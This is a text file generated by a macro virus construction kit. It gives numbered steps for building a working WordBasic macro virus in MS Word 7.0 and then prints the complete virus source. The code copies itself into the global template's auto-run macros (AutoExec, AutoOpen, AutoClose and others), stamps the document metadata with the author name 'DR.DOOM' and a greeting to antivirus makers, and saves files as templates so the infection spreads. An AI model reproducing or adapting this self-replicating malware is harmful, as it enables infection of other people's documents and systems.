==========================================
PLEASE READ THIS IMPORTANT NOTICE FIRST!!!
==========================================

Follow these steps if you want to create a working copy of your virus.

1.  First, you must open this text file in Windows Notepad
2.  Copy the sections between <cut here>.
3.  Start MS Word 7.0
4.  Type anything you like in the document editor then save your
    work as a Document Template.
5.  Exit MS Word 7.0
6.  Re-Start MS Word 7.0 and open the document template you just
    created.
7.  Select Tools|Macro and the 'Macro List' dialog box will open.
8.  Type "AutoOpen" in the 'Macro Name' textbox
9.  In the 'Macros Available In' column select the document
    template that you just created.  The name will vary depending
    on what name you gave when you saved it.
10.  Click 'Create' with your left mouse button.
11.  Now, just paste the code you copied with Windows Notepad
     in the macro editor.
12.  Lastly, select File|Save All to save your document template.
     Remember to select 'Yes' when asked whether you want to keep
     changes to the document template.

-------<cut here>-------------------------------------------------
Sub MAIN
On Error Goto Errorhandler

REM Gets The Filename Of The Active Document
Fname$ = FileName$()
MacName$ = Fname$ + ":AutoOpen"

REM Odysseus Macro Virus Construction Kit Creation Marker
FileSummaryInfo .Comments = "[Created With Odysseus Version 1.00]"

REM Internal Message For AVs To See
FileSummaryInfo .Subject = "HELLO DR.DOOM IS GREETING FROM HELL !!!!"

REM Name Of Virus
FileSummaryInfo .Author = "DR.DOOM"

REM Infects The Global Template
MacroCopy MacName$, "Global:AutoExec"
MacroCopy MacName$, "Global:AutoNew"
MacroCopy MacName$, "Global:AutoOpen"
MacroCopy MacName$, "Global:AutoClose"
MacroCopy MacName$, "Global:AutoExit"

REM Errorhandler Subroutine
Errorhandler:
If IsDocumentDirty() = - 1 Then
MacroCopy "Global:AutoOpen", MacName$
End If
FileSaveAs .Format = 1
End Sub
-------<cut here>-------------------------------------------------
